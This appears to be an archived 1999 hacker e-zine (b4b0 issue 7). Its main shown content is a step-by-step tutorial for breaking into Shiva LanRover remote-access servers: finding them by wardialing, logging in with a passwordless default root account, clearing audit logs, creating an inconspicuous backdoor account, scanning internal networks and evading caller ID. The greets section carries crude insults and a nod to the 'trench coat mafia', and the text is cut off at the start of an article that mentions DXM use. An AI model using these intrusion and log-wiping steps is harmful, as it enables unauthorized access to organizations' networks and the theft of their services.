home *** CD-ROM | disk | FTP | other *** search
/ Cuteskunk BBS / cuteskunk.zip / cuteskunk / unsorted-zines / b4b0-7.txt < prev    next >
Text File  |  2003-06-29  |  141KB  |  3,347 lines

  1. [ from the unexplored areas of the human brain comes.. ]
  2.  
  3.      _________         ______       _________     _________    
  4.     /\   ___  \       /|     \     /\   ___  \   /\   ___  \
  5.    /  \  \ /\  \     | |  |\  \   /  \  \ /\  \ /  \  \ /\  \
  6.    \   \  \__\  \    | |  |_\  \__\   \  \__\  \\   \  \  \  \
  7.     \   \       <    | |          \\   \       < \   \  \  \  \
  8.      \   \   ___ `\  |/\_____     _\\   \   ___ `\\   \  \  \  \
  9.       \   \  \ /\  \ / /     \    \  \   \  \ /\  \\   \  \  \  \
  10.        \   \  \__\  \\/____   \    \  \   \  \__\  \\   \  \__\  \
  11.         \   \________\     \   \____\  \   \________\\   \________\
  12.          \  /        /      \  /    /   \  /        / \  /        /
  13.           \/________/        \/____/     \/________/   \/________/  KKR
  14.  
  15.              s           e            v            e            n              
  16.       
  17.         the experience of new ideas and obtuse perspective   
  18.  
  19.  
  20.         [b4b0 inc. (c) 1999 all rights reserved]
  21.             [ disrupting the classes of school teachers ]     
  22.         [ around the world.                 ]    
  23.  
  24.         [      this zine is best viewed in vi       ]
  25.             
  26.                  [TABLE OF CONTENTS]
  27.  
  28. (00). Greets, Hellos, Staff, What not.
  29. (01). Introduction - by ph1x *y0r elite edit0r* (heed my advice)
  30. (02). Hacking Shiva-Lan-Rover-Servers - [Hybrid]
  31. (03). How to have an out of body experience - [ph1x]
  32. (04). Womper language interpretor - [chrak] 
  33. (06). Buffer overflow exploitation - [ph1x]
  34. (07). The stupidity that lies in credit fraud - [KKR]
  35. (08). Screwing around with /dev/audio - [ph1x] 
  36. (09). My day in age(Firewall, a magic bullet?) - [rhinestone]
  37. (10). d0x (For your harrassing enjoyment) - [pG]
  38. (11). Coding a shell from the ground up - [ph1x]
  39. (12). The art of writing shell code - [smiler]
  40. (13). The telephone system/network part 1 - [pabell]
  41. (14). Wu-ftpd remote/local exploit for [12]-[18] - [cossack/smiler]
  42. (15). Wu-ftpd buffer overflow scanner for 12-18 - [ph1x]
  43. (16). IRC lawgz, cybersex erotica - [b4b0]
  44. (17). Revolution against the catholic church - [schemerz]
  45. (18). bsaver.c overview    - [cp4kt]
  46. (19). Conclusion - [ph1x]  
  47.  
  48.  
  49. Additional pieces included in this issue of b4b0 are...
  50.  
  51. [ bouncer.c ] ---------->  /juarez/bouncer.c |  intruderx
  52. [ Encrypt.c ] ---------->  /juarez/encrypt.c |  tragen
  53. [ GHCgi.c ] ------------>  /juarez/Cgi.c     |  FreD
  54. [ Carp.c    ] ---------->  /juarez/carp.c    |  comp4ct
  55. [ Scanned dialups ] ---->  /juarez/carriers  |  comp4ct
  56. [ FreeBSD rootkit ] ---->  /juarez/fsd.gz    |  icesk & KKR
  57. [ b4b0 screensaver ] --->  /juarez/bsaver.c  |  cp4kt/qytpo
  58. [ el8 .zip of misc ] --->  /juarez/misc.zip  |  milcrat
  59.  
  60.  
  61. . -- ---b-4-b-0--r-e-v-o-l-u-t-i-o-n-a-r-i-e-z--- -- -       
  62. |
  63. |     ph1x -----------  -----> the chosen one
  64. :     jsb4ch ---- --- -------> the undecided one
  65. .     t1p -------    --------> acclaimed b4b0 adm1n
  66.     gr1p ----- -- - -------> he whos accent slays
  67. .    j\ ------ -- ---- -----> the freezing wonder
  68.     chr4k ----- ------ ----> the one who operates with a blown mind
  69.     comp4ct --- ------ ----> he whom claims to be a b4b0 saint
  70. .    p4bell ---- ------ ----> the one called the golden child 
  71.     coss4ck ---------------> the one of proclamation
  72.     sm1ler ----------------> he who is emotionally content
  73.  
  74. . -- ---b-4-b-0--w-r-i-t-e-r-s--a-n-d--o-t-h-e-r--p-e-r-v-e-r-t-s--- --  -
  75. |
  76. |    icesk        emf        zayten
  77. :    pG        schemerz    
  78.     Hybrid        assem
  79. .    Qytpo        e-
  80.     rhinestone    samj
  81.     jnz        polder
  82. .        
  83.  
  84. --- Official IRC channel   -> efnet / #b4b0 
  85. --- most idiotic site ever -> www.anticode.com 
  86. --- irc chick of the month -> MostHated
  87. --- greets to            -> #!animalcrackers, rhino9, samjs mom, duke,
  88.                   horizon, LJ & Falon, HNN, those who
  89.                   know who they are that have helped us and that
  90.                   we forgot about *sorry*, chixy + miah of the
  91.                   netcis crew (some of us started there!), the
  92.                   trench coat mafia, the NRA   
  93. --- homosexual          -> so1o (its good you came out of the closet)
  94. --- fuck yous           -> DigiEbola, silitek (as always), those who live
  95.                   their lives around 'taking irc channels', and
  96.                   people who molest their children (u siq fuqz)  
  97. --- note           -> just because you have a southern accent and
  98.                   hate jews doesn't mean you don't have to pay
  99.                   your taxes.
  100. --- interesting fact       -> the now irc fad of saying "HEH" was invented
  101.                   in #b4b0. so we must require you to say the 
  102.                   following when using HEH :
  103.                   <somenick> HEH (c) b4b0 1999 
  104. ---  P.S.           -> we need more supporters who will write things
  105.                   for us other than inetd backdoors. submit your
  106.                   article/code/remarks submissions@b4b0.org
  107.  
  108.  
  109.             - -- ---> the bandz     <--- -- -
  110.  
  111. lo fidelity all stars, rage against the machine, the chemical brothers, the 
  112. crystal method, misfits, minor threat, the decepticonz, danzig, and much, much
  113. much more!
  114.  
  115.                  - -- ---> interesting     <--- -- -
  116. -- --  > www.babo.com - best gossip in korea!
  117.  -- -- > www.babo.net - aleman?
  118. -- --  > trench coat mafia - bang.
  119.  -- -- > vandalisation of body - s4d1zm
  120. -- --  > british association of balloon operators (babo) - fear that.
  121.  
  122.  
  123.  
  124. -------------------------------------------------------------------------------
  125.   !b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!
  126. -------------------------------------------------------------------------------
  127.  
  128. Greatest movie of all time, "Gummo". ---->
  129.  
  130. I walked into the fruit market today, the clerk thought I was some out of
  131. town hick. "Those apples will be 2 dollars a piece." He tells me. This is
  132. where I outsmarted him. I hand him a 5 dollar bill, and just as he's handing
  133. me a dollar change, I say.. "keep it, were even." On the way out, I stepped
  134. on a grape.     
  135.  
  136.     
  137. ******************************************************************************
  138.                         [INTRODUCTION]
  139. ******************************************************************************
  140.  
  141.  y0y0y0 We have had several people who have taken charge
  142. as editor for this issue, but have not followed through with there 
  143. responsibilities. Therefore, me(ph1x) the unreliable drug addict has been
  144. chosen to get all of the submissions together and put together a nice
  145. issue with good quality reading material. I have miraculously managed to
  146. do so, so read to your hearts desire, and enjoy this issue. HEH!.
  147.  
  148.  
  149. PS. I apologize for the extreme lateness of this issue, its just 
  150.     that jsbach *cough* I mean.. various people said they were 
  151.     going to write articles, and never did. =)
  152.  
  153. MISC:
  154.  
  155. QUOTE: <kwan> you are the maker of youre 
  156.   own destiny(Kwan = Gemmi) <-- These words inspired me.
  157.  
  158.   <gezus> Real hackers drink chocolate milk!
  159.  
  160.   b4b0 site of the month: http://www.frognet.net/dxm <- CHECK IT OUT!
  161.   
  162. L3tz giaT diZ sm4ck g01nG!@#$
  163.  
  164.  
  165. -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
  166.                 Hacking the Shiva-LAN-Rover System
  167. -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
  168.  
  169. By Hybrid (th0rn@coldmail.com)
  170. April 1999
  171.  
  172.  
  173. Contents:
  174.  
  175. 1. Introduction
  176. 2. What can Shiva lan rovers do?
  177. 3. The command line
  178. 4. System security
  179. 5. PPP
  180.  
  181. 1. Introduction
  182.  
  183. Shiva systems are becoming increasingly popular in the LAN networking world.
  184. If like me you have done quite alot of scanning you would have come accross a
  185. login prompt similar to this: [@ Userid:] If you have never seen this before,
  186. take a look at some of the 9x scans at www2.dope.org/9x. In this file I am
  187. going to fokus on the security strengths and weaknesses of the ShivaLanRover
  188. networking system, and give a general overview of what can be done with such
  189. systems. The Shiva system is a network security problem in it's own right, in
  190. the sense that once you have gained access to one of these platforms, you
  191. have the opotunity to explore the entire network on which the system is
  192. based, in essance, you are on the trusted side of the firewall. If you would
  193. like a copy of the ShivaLanRover software just FTP to ftp.shiva.com or get it
  194. via the WWW.
  195.  
  196. To find a Shiva, the first thing you should do is dust off that old wardialer
  197. program, and start scanning local or toll-free prefix assignments, if you
  198. can't do this, you suck, go away. You will know when you have found a Shiva
  199. when you are confronted with the following prompt:
  200.  
  201. @ Userid:
  202.  
  203. or if Radius authentification is enabled:
  204.  
  205. Starting Radius Authentification....
  206. @ Userid:
  207.  
  208. Blah, ignore the radius authentification thing for now, it's just a lame
  209. attempt to make the system look as if it has been secured, in most cases the
  210. sysamin would have missconfigured the authentification and you will be
  211. supprised as to how easy it is to get in. So you are at the login prompt,
  212. what next? - As in most OS's Shivas have a nice set of default logins, so the
  213. sysadmins poor setup is your gain. Try this: login: <root> pass: <NO PASS>.
  214. The root login will work 9 times out of 10. The reason that the root account
  215. works alot is beacuse in some cases the admin is not even aware the account
  216. even exists! Most of the system setup is done via the main terminal, so the
  217. admin does'nt have to login. the root account is not listed in the userfile
  218. database, so most admin's overlook it. In some cases the admin would have set
  219. up there own acount with somthing like <admin> <password> but if the admin
  220. has any common sense you will not get in with that. Like most OS's, Shiva
  221. systems have an audit log, so don't sit there trying to brute force anything,
  222. once you are in, you can clear the system log, but more on that later. OK,
  223. you've found a Shiva, you've loged on as <root> <no password>, now what? -
  224. read on.
  225.  
  226. Once loged in, you will be droped into the Shiva command line prompt, which
  227. should look somthing like this:
  228.  
  229. Shiva LanRover/8E, Patch 4.5.4p6 98/06/09  (Version and type of Shiva)
  230. ShivaLanRover/8E# (The command prompt. Can be configured to say anything)
  231.  
  232. To get a list of the available commands type <help> or <?> this will reveal a
  233. menu similar to this:
  234.  
  235. ShivaLanRover/8E# ? <enter>
  236.  
  237. alert                          Send text alert to all dial-in users
  238. busy-out line <number>         Busy-out serial line modem
  239. clear <keyword>                Reset part of the system
  240. comment                        Enter a comment into the log
  241. configure                      Enter a configuration session
  242. connect <port pool>            Connect to a shared serial port
  243. crashdump                      Write crashblock to log
  244. disable                        Disable privileges
  245. help                           List of available commands
  246. initialize <keyword>           Reinitialize part of the system
  247. lan-to-lan <keyword>           Manage LAN-to-LAN connections
  248. passwd                         Change password
  249. ping <IP host>                 Send ICMP echo to IP host
  250. ppp                            Start a PPP session
  251. quit                           Quit from shell
  252. reboot                         Schedule reboot
  253. show <keyword>                 Information commands, type "show ?" for list
  254. slip                           Start a SLIP session
  255. telnet <IP host>               Start a Telnet session
  256. testline                       Test a line
  257.  
  258. The first thing you should do is check to see who is online, at the # prompt
  259. use the show command to reveal the list of current online users:
  260.  
  261. ShivaLanRover/8E# show users <enter>
  262.  
  263. Line             User                     Activity  Idle/Limit    Up/Limit
  264.    1             jsmith                      PPP       0/   10     0/ None
  265.    2             root                        shell     0/   10     0/ None
  266. Total users: 2
  267.  
  268. So here we see ourselves loged in on line 2, and a PPP user on line 1. Note
  269. that most of the time users are not configured to be allowed remote dialin
  270. PPP access, so the user jsmith is probably at a terminal on the LAN. Now you
  271. can see who is online, ie- check the admin is not loged in. Now you need to
  272. get a rough idea of the size of the system and it's network. At the # prompt
  273. type:
  274.  
  275. ShivaLanRover/8E# show lines <enter>
  276.  
  277. Async Lines:
  278. Line State   Rate/P/Stop/   RA|DCD|DSR|DTR|RTS|CTS|Fr errs| Overruns|PErrs
  279.    1 IDLE   57600/N/   1/     |OFF|ON |on |on |ON |      0|        0|   0
  280.    2 CHAR   57600/N/   1/     |ON |ON |on |on |ON |      2|        0|   0
  281.    3 IDLE   57600/N/   1/     |OFF|ON |on |on |ON |      0|        0|   0
  282.    4 IDLE   57600/N/   1/     |OFF|ON |on |on |ON |      0|        0|   0
  283.    5 IDLE   57600/N/   1/     |OFF|OFF|on |on |OFF|      0|        0|   0
  284.    6 IDLE  115200/N/   1/     |OFF|ON |on |on |ON |      0|        0|   0
  285.    7 IDLE   57600/N/   1/     |OFF|ON |on |on |ON |      0|        0|   0
  286.    8 IDLE  115200/N/   1/     |OFF|ON |on |on |ON |      0|        0|   0
  287.  
  288. Here we see a list of the modem ports, as you can see it has 8, this is about
  289. average for most Shiva systems. So now we know how many serial lines there
  290. are, we need to get a rough idea as to how big the network itself is, to do
  291. this type:
  292.  
  293. ShivaLanRover/8E# show arp <enter>
  294.  
  295. Protocol   Address            Age  Hardware Addr      Type    Interface
  296. Internet   208.122.87.6       4m   x0-x0-B0-2x-Dx-78  ARPA    Ethernet:IP
  297. Internet   208.122.87.4       4m   AA-0x-x4-00-0C-04  ARPA    Ethernet:IP
  298. Internet   208.122.87.5       4m   Ax-00-04-0x-xD-x4  ARPA    Ethernet:IP
  299. Internet   208.122.86.4       10m  AA-x0-04-00-0C-04  ARPA    Ethernet:IP
  300. Internet   208.122.86.40      0m   AA-00-04-00-x1-04  ARPA    Ethernet:IP
  301. Internet   208.122.86.147     4m   00-80-5x-31-F8-Ax  ARPA    Ethernet:IP
  302. Internet   208.122.86.145     4m   00-80-5x-FE-C9-x8  ARPA    Ethernet:IP
  303. Internet   208.122.86.200     0m   00-x0-A3-xF-21-C8  ARPA    Ethernet:IP
  304. Internet   208.122.86.51      4m   00-x0-B0-01-36-3x  ARPA    Ethernet:IP
  305.  
  306. Showing the arp cache reveals some of the connected boxes to the LAN, aswell
  307. as ethernet address, and type of protocol. Now we have established the kind
  308. of system we are on, it's time to do some exploring, which is where I shall
  309. begin this text file.
  310.  
  311.  
  312. 2. What can Shiva lan rovers do?
  313.  
  314. Shiva LanRover systems are very big security weaknesses if installed on any
  315. network. The reason for this is that some of the default settings can be
  316. easily overlooked by the admin. A Shiva system can be configured to provide
  317. a wide variety of network services, some of which are listed here:
  318.  
  319. PPP (point-to-point protocol) This is the key to gaining access to the
  320. network on which the Shiva is based upon, in most cases the network will have
  321. an internal DNS server, and if you are lucky, the network which the system is
  322. based will be connected to the internet. Hint hint, PPP, toll-free. But just
  323. using a Shiva for free net access would be boring, which is why I am going to
  324. discuss the other features of Shivas.
  325.  
  326. Modem Outdial. In alot of cases the system would have been configured to
  327. allow modem outdialing which can be good for calling BBS's, diverting to
  328. other dialups, scanning, but again, this is lame, just using a Shiva for
  329. modem outdialing is boring, use your imagination. If you manage to get a PPP
  330. connection, and the system is net connected, you could get online, and at the
  331. same time call your favourite BBS. I'll explain how to do all of this later.
  332.  
  333. Telnet, ping, traceroute etc. These are the command line tools which will
  334. enable you to determine whether the system is connected to the internet or
  335. not. More on this later.
  336.  
  337. It's time to go into detail about all of the Shivas functions and commands, I
  338. will concentrate on what you can do with root access, because that is the
  339. only account you are likely to gain access to. 
  340.  
  341.  
  342. 3. The command line
  343.  
  344. When loged into the Shiva shell, you have the following commands at your
  345. disposal:
  346.  
  347. alert (Send text alert to all dial-in users) - Self explanitory.
  348. busy-out uart <call-interface> (Busy-out UART port)
  349. clear <keyword> (Reset part of the system)
  350.  
  351. The clear command is a nice feature of the Shiva system. The first thing you
  352. should do when on a Shiva is make sure you erase all logs of your commands
  353. and login times etc.. to do this all you need to do is type <clear log> This
  354. will erase and reset the audit log, and also any invalid logins to the Shiva.
  355. There are also other clear commands such as <clear arp> etc, but these will
  356. all cause system problems and get you noticed, best leave this alone for the
  357. time being.
  358.  
  359. comment (Enter a comment into the log)
  360. configure (Enter a configuration session)
  361.  
  362. Heres the part where you can get the system to do what you want it to do, ie-
  363. to get a PPP connection you will need to set up another account with shell
  364. and PPP privalages. The root account does not allow PPP connections, so here
  365. is where you will need to do your stuff. To get anywhere with a Shiva you
  366. need to create a new account, using the config command you can create a new
  367. user account with greater privalges than root. Before you make a new account
  368. it is a good idea to see what kind of setup the other accounts have on the
  369. system, you don't want to make an account that will stick out from the other
  370. accounts, so type:
  371.  
  372. show security <enter> (this gives a list of the security configuration and
  373. the user list.) you should see somthing like this:
  374.  
  375. [UserOptions]
  376. PWAttempts=0
  377. ARARoamingDelimiter=@
  378. ExpireDays=30
  379. GraceLogins=6
  380.  
  381. [Users]
  382. admin=/di/do/rt/pw/sh/pwd=hH8FU4gBxJNMMRQ0yhj5ILUbaS/ml=3/fail=1/time=425
  383. jsmith=/di/pw/pwd=.b9BJFBhuA1vuqFa9s8KBlxmngZ/ml=2/time=897646052
  384. mjones=/di/pw/pwd=kRaOhlyT7CKMBldLVBVbektbCE/ml=2/fail=5/time=897646052
  385. user911=/di/pw/pwd=7Xkq8TOwB4juRI51OHkDVVos8S/ml=2/time=910919159
  386. another=/di/pw/pwd=YhzD6KBUB7Lh2iKKKSWxuR0gx7S/ml=2/fail=7/time=90767094|9
  387. jadmams=/di/pw/pwd=ET0OhPyT7CyMBldLLKVbektbCE/ml=2/time=902262821
  388. msmith=/di/pw/pwd=sDV1Jxo8QJncIRcl9eoVO6SKBE/ml=2/time=897646052
  389. dsmith=/di/pw/pwd=pv8OhPyT45CyMBldLSKVbektbCE/ml=2/time=897646052
  390. padacks=/di/pw/pwd=HoDVw5MqTM*oTL69tBehqt7tiS/ml=2/time=897646052/grace=1
  391. ljohnson=/di/pw/pwd=r.y9NJbrCWKfsSeu9FbfJpAIzZ/ml=2/time=897646052
  392.  
  393. Here we get a list of the configured users on the system. As you can see the
  394. admin has made him/herself their own account, while other users have accounts
  395. that allow logins via their terminals, but not remotely. In the above example
  396. all the users have been assigned passwords, so it would be a good idea when
  397. you make your own account to have one aswell. The idea is to make an account
  398. that will blend in with the others and not look to obvious. The passwords in
  399. the external user list are all 3DES (triple DES) encrypted. The type of user
  400. account set up is determined by the options, such as jsmith=/di/do etc, more
  401. on these functions in a bit. OK, now we need to set up our own account, to do
  402. this we need to enter a configuration session, at the command line prompt
  403. type: ShivaLanRover/8E# config <enter>
  404.  
  405. You will then drop into the configuration session.
  406.  
  407. Enter configuration file lines.  Edit using:
  408. ^X, ^U      clear line
  409. ^H, DEL     delete one character
  410. ^W          delete one word
  411. ^R          retype line
  412. Start by entering section header in square brackets []
  413. Finish by entering ^D or ^Z on a new line.
  414.  
  415. config> (here is where you enter the config commands, to make you own account
  416. do the follwing)
  417.  
  418. config> [users]
  419. config> username=/di/do/sh/tp/pw
  420. config> ^D <------ (type control D to finish)
  421.  
  422.  
  423. Review configuration changes [y/n]? y
  424. New configuration parameters:
  425. [users]
  426. username=/di/do/sh/tp/pw
  427. Modify the existing configuration [y/n]? y
  428. You may need to reboot for all changed parameters to take effect.
  429.  
  430. You've just created your own user account which you can use for PPP
  431. connections etc. To begin with your account is un-passworded, so when you log
  432. back in just hit enter for your password, you can later change this. The /sh
  433. part of the user configuration means you can remotely log into the command
  434. shell, /pw means you have the ability to define your own password, if you
  435. wanted to give yourself another root account, you would use the switch /rt.
  436. In combination with the show config command you can also alter other system
  437. configurations via this method, although it is a very good idea not to 
  438. alter anything. Now your account has been set up, all you do is re-connect to
  439. the system and login as your username, more on this later.
  440.  
  441. connect <PhoneGroup pool> (Connect to a serial port or modem)
  442.  
  443. This is another one of the good features of Shivas, you can remotely control
  444. a series of modems on the system, and in alot of cases dialout. If you want
  445. to call a BBS, note you cannot upload using Zmodem or similar protocols,
  446. although you would be able to download, but expect a few CRC checksum errors.
  447. To connect to a modem type: connect all_ports <enter> you will then drop into
  448. one of the modem pools, as follows:
  449.  
  450. Connecting to Serial2 at 115200 BPS.
  451. Escape character is CTRL-^ (30).
  452. Type the escape character followed by C to get back,
  453. or followed by ? to see other options.
  454.  
  455. (here basic modem commands are nessasary, use the follwing to dialout)
  456.  
  457. ATZ (initialise modem)
  458. ATDTxxxxxxxxx (atdt then phone number) note in some cases the modem outdial
  459. with be based upon the system PBX, so sometimes you will have to figure out
  460. the outdialing code, which should be somthing simple like dialing a 9 before
  461. the number you want to connect to. To disconnect from the outdialing session
  462. type control C, or ^C. This will take you back to the command line. As with
  463. the other system events, outdialing is loged into the audit file, along with
  464. the number you called. It is generaly a good idea to clear the audit log
  465. after things like PPP or dialout, again just type clear log <enter>.
  466.  
  467. cping <IP host> (Send continuous ICMP echoes to IP host)
  468. crashdump (Write crashblock to log)
  469. detect (Detect the configuration of an interface)
  470. disable (Disable your root privaleges)
  471. dmc <keyword> (Information commands, type "dmc ?" for list)
  472.  
  473.         down <slot> <firstmodem> (last Remove modems from CCB pool)
  474.         info <slot> <modem> (Print info for specified modem)
  475.         mupdate <slot> <firstmodem> (l Update Rockwell modem FW)
  476.         state (Print state of a modem)
  477.         status (Print status of all modems)
  478.         trace (Trace message passing)
  479.         up <slot> <firstmodem> (lastmo Add modems to CCB pool)
  480.         test_1slot <slot> (Tests DMC card in slot specified)
  481.         test_allcards (Tests all DMC cards found in system)
  482.         test_golden <golden slot> (Tests all DMC cards against a Golden DMC)
  483.         test_loopall <count 0-99> (Tests All DMC's for count)
  484.         test_modempair <slot1> (modem1 Tests modems against each other)
  485.         test_slotpair <slot1> <slot2> (Tests a DMC card against another)
  486.         test_xmitloop <s> <m> <s> <m> (Tests modem pair for count)
  487.  
  488. help (List of available commands)
  489. history (List of previous commands)
  490. initialize <keyword> (Reinitialize part of the system)
  491. l2f <keyword> (L2F commands)
  492.  
  493.         close <nickname> (Close tunnel to L2F HG)
  494.         login (Start L2F session)
  495.         tunnels (Show open tunnels)
  496.  
  497. lan-to-lan <keyword> (Manage LAN-to-LAN connections)
  498. passwd (Change password)
  499. ping <IP host> (Send ICMP echo to IP host)
  500. ppp (Start a PPP session)
  501. quit (Quit from shell)
  502. reboot (Schedule reboot)
  503. route <protocol> (Modify a protocol routing table)
  504. rlogin <IP host> (Start an rlogin session)
  505. show <keyword> (Information commands, type "show ?" for list)
  506.  
  507. show+
  508. account <keyword> (Accounting information)
  509. arp (ARP cache)
  510. bridge <keyword> (Bridging information)
  511. buffers (Buffer usage)
  512. configuration (Stored configuration, may specify sections)
  513.  
  514. the show config command will reveal all the system configuration setups,
  515. includings DNS server information, security configurations, IP routing etc.
  516. It will also show the internal IPs of radius authentification and TACAS
  517. servers.
  518.  
  519. show+
  520. finger (Current user status)
  521. interfaces [name1 [name2 ... ] (Interface information)
  522. ip <keyword> (Internet Protocol information, type "show ip ?" for list)
  523.  
  524. To get an idea of the routing information, and again how big the network is
  525. type, show ip route. This will bring up a routing table, and again give you
  526. an idea as to where the connected boxes are, it is a good idea to note the IP
  527. prefixes.
  528.  
  529. show+
  530. lan-to-lan (LAN-to-LAN connections)
  531. license (Licensing information)
  532. lines (Serial line information)
  533. log (Log buffer)
  534.  
  535. The show log command will display the system audit log in more format. Here
  536. you will be able to see what is going on on the system, ie- is it primarily
  537. used for PPP, dialout etc. If users use the system for outdialing, you can
  538. even see the numbers that they dial. Here is a cut down example as to what
  539. you wiuld see in a system log file:
  540.  
  541. Mon 15 16:24:29 GMT 1998 4530  Serial4: "krad" logged in
  542. 00:01  4531  Serial4:PPP: Received LCP Code Reject for code 0D
  543. 00:01  4532  Serial4:PPP: Received PPP Protocol Reject for IPXCP (802B)
  544. 00:00  4533  Serial4:PPP:IP address xx.xx.xx.xx dest xx.xx.xx.xx bcast
  545. 00:00  4534  Serial4:PPP: IPCP layer up
  546. 00:04  4535  Serial4:PPP: CCP layer up
  547. 14:09  4536  Serial4:PPP: IPCP layer down
  548. 00:00  4537  Serial4:PPP: CCP layer down
  549. 00:00  4538  Serial4:PPP: LCP layer down
  550. 00:01  4539  Serial4:PPP: CD dropped on connection
  551. 00:00  4540  Serial4: "krad" logged out: user exit after 14:17 (Dial-In PPP,)
  552. 00:06  4541  Serial4: Rate 115200bps
  553. 00:00  4542  Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W'
  554. 00:01  4543  Serial4: Initialized modem
  555. 04:56  4544  setting time of day from real-time clock to Wed Nov 25 16:43:44
  556. 18:27  4545  Serial4: New Dial-In session
  557. 00:00  4546  Serial4:PPP: LCP layer up
  558. 00:00  4547  Serial4: "krad" logged in
  559. 00:01  4548  Serial4:PPP: Received LCP Code Reject for code 0C
  560. 00:00  4549  Dialin:IPX configured net 9823O049
  561. 00:00  4550  Serial4:PPP: IPXCP layer up
  562. 00:00  4670  Serial4: New Command Shell session
  563. 00:03  4671  Serial4: "root" logged in
  564. 01:38  4672  Serial4: "root" logged out: user exit after 01:42 (Command Shell)
  565. 00:06  4673  Serial4: Rate 115200bps
  566. 00:01  4674  Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W'
  567. 00:00  4675  Serial4: Initialized modem
  568. 55:11  4676  Could not parse IP SNMP request.
  569.  
  570. In the system log, you will also see invalid login attempts, error messages,
  571. and general system events. Because the log file logs everything, it is a good
  572. idea to erase your own presence in it.
  573.  
  574. show+
  575. modem <keyword> (Internal modem information, type "show modem ?" for list)
  576. netbeui <keyword> (NetBeui information, type "show netbeui ?" for list)
  577. novell <keyword> (NetWare information, type "show novell ?" for list)
  578. ppp (PPP multilink bundles and links)
  579. processes (Active system processes)
  580. security (Internal userlist)
  581. semaphores (Active system semaphores)
  582. slot <keyword> (Internal serial slot information, type "show slot ?" for list)
  583. upload (Upload information)
  584. users (Current users of system)
  585. version (General system information, also shows DNS info)
  586. virtual-connections (Virtual Connection information)
  587.  
  588. slip (Start a SLIP session)
  589. telnet <IP host> (Start a Telnet session)
  590. tftp (Download new image, ie- system config files)
  591. tunnel <IP host> (Start a Tunnel session)
  592. wan [action] <wan interface> (Perform actions on WAN Interface)
  593.  
  594. 4. System security
  595.  
  596. Shivas can be very weak on security, due to the exposed root account. If the
  597. system is configured properly they can be very secure systems, although this
  598. is usually not the case. There are many security options for the Shiva system
  599. including Radius Authentification, SecurID, TACAS, and just the standard
  600. secured login. In some cases an admin will use a secondary server to act as
  601. the Radius Authentification. In this case, the setup would look somthing like
  602. this.
  603.  
  604.  
  605.    [RADIUS Authentification Server]    } The server contains a secured user
  606.       |                                  list, which will be used to verify
  607.       |                                  login requests. The login is 
  608.    [Router]                              determined if the user can be 
  609.     |   |                                verified by the server.
  610.     |   |                   } The Shiva sends the login request to RADIUS.
  611.    [Shiva System]           } Starting Radius Authentification... @ Userid:
  612.  
  613. Sometimes a system will be configured to work with a number of different
  614. Shivas on a network. For example, using the same idea as above, but without
  615. the Radius server, a secondary shiva may be installed to act as the security
  616. server, whereas all other Shiva systems refer to it for user login
  617. verification. This can be a real bitch if you have loged into a system, but
  618. the above setup has been implemented. For example, say you loged in as root,
  619. and you want to set up a PPP account. The first thing you would do is check
  620. to see what kind of setup existing users have by typing <show security> If
  621. the verification server has been setup, there will be no users in the user
  622. list, instead you have to find the network location of the verification
  623. server, and hope it has an un-passworded root account on it. To find the
  624. verification srever, or primary Shiva, just use the show config command. you
  625. can then telnet from the Shiva you are on, to the Shiva displayed in the
  626. config file, you should then get the @ Userid: login screen again, try root
  627. no pass, if this does not work, it is possible to temorarily configure your
  628. own server on the network, but this would mean other users will not be able
  629. to login, so leave this alone. If you do manage to login to the server as
  630. root, you have to setup your user account there, because that is where all
  631. the Shivas on the network refer to in order to verify users, this way the
  632. admin only has to maintain one user configuration file.
  633.  
  634. 5. PPP
  635.  
  636. Once you have setup a user account with shell and PPP privaleges, you can
  637. begin exploring the network on which the Shiva is based upon. If the network
  638. is net connected you can get free net access aswell, but this is quite risky,
  639. especially if the admin notices PPP sessions active at 4am, with destinations
  640. such as irc.ais.net:6667. When you first establish a PPP connection to a
  641. Shiva server, the first thing you should do is map out the network. To do
  642. this just run a network, or port scanner accross the domain which the Shiva
  643. is on. As on most networks, you are likely to come accross a variety of
  644. different boxes, such as UNIX boxes, SunOS, shared printers, mail servers,
  645. cisco routers, in one case someone I know found an Amiga box@$!. If the
  646. network is net connected, it is a good idea to use your shell for any net
  647. connections, such as IRC. Once you have an external net connection from a
  648. Shiva it is also possible to similtaniously dialout accross the PSTN to a BBS
  649. or any other system. To do this, you would have to find the network address
  650. of the Shiva server you are on, then telnet back to it and re-login. using
  651. the <connect all_ports> command will give you control over the system modems,
  652. then you can dialout as if you where in terminal mode. If the Shiva you are
  653. on is located on a toll-free number, or even local, it is not a good idea to
  654. use it for net access, or stay on it for a long time. If you must use a Shiva
  655. for net access, it is a good idea to use your PSTN routing skills, and not
  656. dialup to the system directly. The mistake people make when it comes to ANI,
  657. or CLID is that they think only 800 numbers have ANI, and residential numbers
  658. have CLID. This is *wrong* the ANI service can be setup by anyone, it's a
  659. choice, not a standard. If you want to route your call, the best thing to do
  660. is route internationaly, so your origionating clid gets striped at intralata
  661. boundarys on the PSTN. A technique, which I don't wanna give out involves
  662. trunk and carrier hoping. We'll thats about it for this file, hope you
  663. enjoyed it. If you want more information on the Shiva Lan Rover system, just
  664. check out shiva.com, they will have technical guides in pdf format, you can
  665. also download the shiva software from their ftp site.
  666.  
  667. Shouts to the following:
  668.  
  669. [9x] substance phriend siezer vectorx statd
  670.      blotter knight network specialK microdot
  671.      katkiller xramlrak bosplaya deadsoul and
  672.      nino the 9x g1mp.
  673.  
  674. [b4b0] gr1p t1p. #9x #darkcyde Efnet.
  675. backa xio.
  676.  
  677. [D4RKCYDE] downtime elf zomba force mortis
  678.            angel dohboy brakis alphavax
  679.            tonekilla bishopofhell sintax
  680.            digitalfokus mistress.
  681.  
  682.  
  683. -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
  684.                 [Astral Projection]
  685. -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- 
  686.  
  687. How to have an out of body experience. ph1x.
  688. In this article I am going to explain what astral projection is,
  689. and my personal method of accomplishing it.
  690.  
  691. NOTE: This method works for me while sober, and on dxm.
